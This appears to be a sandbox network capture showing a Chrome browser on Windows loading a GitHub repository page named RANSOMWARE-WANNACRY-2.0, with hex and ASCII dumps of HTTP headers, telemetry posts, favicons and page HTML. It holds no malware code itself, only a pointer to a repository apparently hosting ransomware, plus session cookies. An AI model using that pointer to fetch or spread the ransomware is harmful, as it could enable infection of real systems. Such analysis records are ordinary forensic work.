                                                                                      2024-03-23 14:47:27 UTC2913INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      106192.168.2.1649812140.82.113.64436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC794OUTPOST /_private/browser/stats HTTP/1.1
                                                                                      Host: api.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 174
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC174OUTData Raw: 7b 22 73 74 61 74 73 22 3a 20 5b 7b 22 69 6e 63 72 65 6d 65 6e 74 4b 65 79 22 3a 22 54 52 55 53 54 45 44 5f 54 59 50 45 53 5f 50 4f 4c 49 43 59 5f 43 41 4c 4c 45 44 22 2c 22 74 72 75 73 74 65 64 54 79 70 65 73 50 6f 6c 69 63 79 4e 61 6d 65 22 3a 22 74 75 72 62 6f 2d 75 72 6c 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 31 31 32 30 35 32 34 35 35 31 31 2c 22 6c 6f 67 67 65 64 49 6e 22 3a 66 61 6c 73 65 2c 22 73 74 61 66 66 22 3a 66 61 6c 73 65 2c 22 62 75 6e 64 6c 65 72 22 3a 22 77 65 62 70 61 63 6b 22 7d 5d 20 7d
                                                                                      Data Ascii: {"stats": [{"incrementKey":"TRUSTED_TYPES_POLICY_CALLED","trustedTypesPolicyName":"turbo-url","timestamp":1711205245511,"loggedIn":false,"staff":false,"bundler":"webpack"}] }
                                                                                      2024-03-23 14:47:27 UTC1110INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 0
                                                                                      Cache-Control: no-cache
                                                                                      X-RateLimit-Limit: 60
                                                                                      X-RateLimit-Remaining: 60
                                                                                      X-RateLimit-Reset: 1711208847
                                                                                      X-RateLimit-Used: 0
                                                                                      X-RateLimit-Resource: core
                                                                                      X-GitHub-Media-Type: github.v3; format=json
                                                                                      x-github-api-version-selected: 2022-11-28
                                                                                      Access-Control-Expose-Headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Vary: Accept-Encoding, Accept, X-Requested-With
                                                                                      X-GitHub-Request-Id: A75E:26F4CD:2B63553:4C1BC10:65FEEB7F
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      107192.168.2.1649813185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC668OUTGET /favicons/favicon.png HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:27 UTC598INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 958
                                                                                      Content-Type: image/png
                                                                                      Last-Modified: Thu, 19 Oct 2023 22:56:36 GMT
                                                                                      ETag: 0x8DBD0F6A5D47312
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Age: 157
                                                                                      X-Served-By: cache-iad-kiad7000070-IAD, cache-lga21922-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 3304709, 1
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 69e1b22334a591e808e7c508304d141b432458ab
                                                                                      2024-03-23 14:47:27 UTC958INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 03 53 49 44 41 54 78 01 bd 57 8d 4d db 40 14 7e ef 6c 28 a5 52 9b 6e 60 54 22 85 48 4d cd 04 09 13 34 99 a0 64 82 86 09 08 13 00 13 34 9d 00 98 80 8c e0 84 8a 58 22 a8 1e 21 ad 54 35 02 9f 5f ef d9 c4 71 e2 73 48 70 d4 4f 82 9c ef 9d df df bd 3f 23 2c 09 cb b2 0a c6 56 a1 0e 42 56 91 d0 06 04 0b 08 0a 21 11 61 a4 d6 1e 21 39 10 60 57 8e 7f 5f 79 9e 37 5a 86 2f 3e 2b b8 54 b2 0c dc 68 23 e2 e7 58 e0 12 50 ca 74 64 f0 78 e2 b9 ae 07 2f 51 80 2d 36 5f bf 3d 56 cb 16 e4 81 a0 33 ff 8f 71 e2 79 ce 68 69 05 22
                                                                                      Data Ascii: PNGIHDR szzpHYssRGBgAMAaSIDATxWM@~l(Rn`T"HM4d4X"!T5_qsHpO?#,VBV!a!9`W_y7Z/>+Th#XPtdx/Q-6_=V3qyhi"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      108192.168.2.1649814140.82.113.64436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC794OUTPOST /_private/browser/stats HTTP/1.1
                                                                                      Host: api.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 148
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC148OUTData Raw: 7b 22 73 74 61 74 73 22 3a 20 5b 7b 22 69 6e 63 72 65 6d 65 6e 74 4b 65 79 22 3a 22 52 45 46 5f 53 45 4c 45 43 54 4f 52 5f 42 4f 4f 54 45 44 5f 46 52 4f 4d 5f 55 4e 43 41 43 48 45 44 5f 48 54 54 50 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 31 31 32 30 35 32 34 35 36 39 30 2c 22 6c 6f 67 67 65 64 49 6e 22 3a 66 61 6c 73 65 2c 22 73 74 61 66 66 22 3a 66 61 6c 73 65 2c 22 62 75 6e 64 6c 65 72 22 3a 22 77 65 62 70 61 63 6b 22 7d 5d 20 7d
                                                                                      Data Ascii: {"stats": [{"incrementKey":"REF_SELECTOR_BOOTED_FROM_UNCACHED_HTTP","timestamp":1711205245690,"loggedIn":false,"staff":false,"bundler":"webpack"}] }
                                                                                      2024-03-23 14:47:27 UTC1108INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 0
                                                                                      Cache-Control: no-cache
                                                                                      X-RateLimit-Limit: 60
                                                                                      X-RateLimit-Remaining: 60
                                                                                      X-RateLimit-Reset: 1711208847
                                                                                      X-RateLimit-Used: 0
                                                                                      X-RateLimit-Resource: core
                                                                                      X-GitHub-Media-Type: github.v3; format=json
                                                                                      x-github-api-version-selected: 2022-11-28
                                                                                      Access-Control-Expose-Headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Vary: Accept-Encoding, Accept, X-Requested-With
                                                                                      X-GitHub-Request-Id: A766:6D02:2AC33B8:4A9CBFB:65FEEB7F
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      109192.168.2.1649815185.199.110.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC367OUTGET /favicons/favicon.svg HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:27 UTC601INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 959
                                                                                      Content-Type: image/svg+xml
                                                                                      Last-Modified: Thu, 19 Oct 2023 22:56:36 GMT
                                                                                      ETag: 0x8DBD0F6A5D50EA4
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Age: 18
                                                                                      X-Served-By: cache-iad-kiad7000081-IAD, cache-ewr18177-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2934173, 1
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 977ce9c9acffee87b84e893a02999e4556244a1d
                                                                                      2024-03-23 14:47:27 UTC959INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 33 32 22 20 68 65 69 67 68 74 3d 22 33 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 36 20 30 43 37 2e 31 36 20 30 20 30 20 37 2e 31 36 20 30 20 31 36 43 30 20 32 33 2e 30 38 20 34 2e 35 38 20 32 39 2e 30 36 20 31 30 2e 39 34 20 33 31 2e 31 38 43 31 31 2e 37 34 20 33 31 2e 33 32 20 31 32 2e 30 34 20 33 30 2e 38 34 20 31 32 2e 30 34 20 33 30 2e 34 32 43 31 32 2e 30 34 20 33 30 2e 30 34 20 31 32 2e 30 32 20
                                                                                      Data Ascii: <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M16 0C7.16 0 0 7.16 0 16C0 23.08 4.58 29.06 10.94 31.18C11.74 31.32 12.04 30.84 12.04 30.42C12.04 30.04 12.02


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      110192.168.2.1649816140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC841OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0 HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"233ec33510606243e50043e14110c026"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC2946INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 32 32 45 43 0d 0a 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70
                                                                                      Data Ascii: 22EC<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-p
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                      Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 67 69 74 68 75 62 2d 31 39 63 38 35 62 65 34 61 66 39 63 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                      Data Ascii: github-19c85be4af9c.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61
                                                                                      Data Ascii: githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githuba
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70
                                                                                      Data Ascii: er" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer="defer" typ
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 66 62 34 62 38 64 34 30 66 32 30 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75
                                                                                      Data Ascii: type="application/javascript" src="https://github.githubassets.com/assets/element-registry-fb4b8d40f206.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modu
